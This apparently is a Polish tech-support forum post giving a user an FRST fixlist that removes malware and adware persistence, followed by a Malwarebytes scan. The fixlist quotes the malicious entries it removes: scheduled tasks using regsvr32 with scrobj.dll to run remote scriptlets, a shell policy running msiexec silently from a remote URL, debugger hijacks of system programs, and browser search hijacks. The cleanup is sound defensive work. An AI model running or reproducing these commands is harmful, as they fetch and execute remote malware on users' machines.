Otwórz notatnik systemowy i wklej: Task: {774ADB1F-FDDD-4118-B573-27552B46B560} - System32\Tasks\PowerWord-SCT-JT => Regsvr32.exe /s /i:hxxp://point.lbyhbyc.com/?data=zDlkMj8yMjJQRjEdOUZXMjI8RkI2OYY3RYZLMjY5RWH5NWw8MF== scrobj.dll Task: {B9E1F3A3-441A-4E14-9D98-4F523EAB2659} - System32\Tasks\Windows-WoShiBeiYongDe => Regsvr32.exe /s /i:hxxp://u76wtn6.x.incapdns.net/?data=zDlkMj8yMjJQRjEdOUZXMjI8RkI2OYY3RYZLMjY5RWH5NWw8MF== scrobj.dll Task: {B9EF3E47-00AB-45CB-A71A-7BC792D6E3FC} - System32\Tasks\{77FEA82C-EB52-4C42-9703-4CA018F8B47B} => pcalua.exe -a "C:\Program Files (x86)\Elex-tech\YAC\uninstall.exe" HKU\S-1-5-21-3742238334-998776455-2192785950-1001\...\Policies\system: [Shell] explorer.exe,msiexec.exe /i http://point.orangeiloveyou.com/?data=zDlkMj8yMjJQRjEdOUZXMjI8RkI2OYY3RYZLMjY5RWH5NWw8MF== /q IFEO\DisplaySwitch.exe: [Debugger] IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe IFEO\taskmgr.exe: [Debugger] HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = HKLM\Software\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = HKU\S-1-5-21-3742238334-998776455-2192785950-1001\Software\Microsoft\Internet Explorer\Main,Start Page = Edge HomeButtonPage: HKU\S-1-5-21-3742238334-998776455-2192785950-1001 -> hxxp://www.ourluckysites.com/?type=hp&ts=1493274990&z=f9d0aed354304ccf991c7cdg2zatcc6o1mazetab3o&from=che0812&uid=3219913727_263876_F2BACCBE CHR DefaultSearchURL: Default -> hxxp://www.mystarting123.com/search/index.php?z=e02539186a05624732ad1c8gbzat3w9q1g4m3qdw1m&q={searchTerms} CHR DefaultSearchKeyword: Default -> mystarting123 CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx R2 ibtsiva; %SystemRoot%\system32\ibtsiva [X] U2 CSHMDR; Brak ImagePath 2017-05-25 18:12 - 2017-05-25 18:58 - 00000000 ____D C:\AdwCleaner 2017-05-11 13:37 - 2017-05-11 13:37 - 00000000 _____ C:\WINDOWS\SysWOW64\3333333 2017-05-11 13:37 - 2017-05-11 13:37 - 00000000 _____ C:\WINDOWS\SysWOW64\1111111 2017-05-05 15:51 - 2017-05-05 15:51 - 00003264 _____ C:\WINDOWS\System32\Tasks\{77FEA82C-EB52-4C42-9703-4CA018F8B47B} EmptyTemp: Plik zapisz pod nazwą fixlist.txt i umieść obok FRST w tym samym folderze. Uruchom jako administrator FRST i kliknij w Fix/Napraw. Przeskanuj progr. Malwarebytes Anti-Malware http://www.bleepingcomputer.com/download/malwarebytes-anti-malware/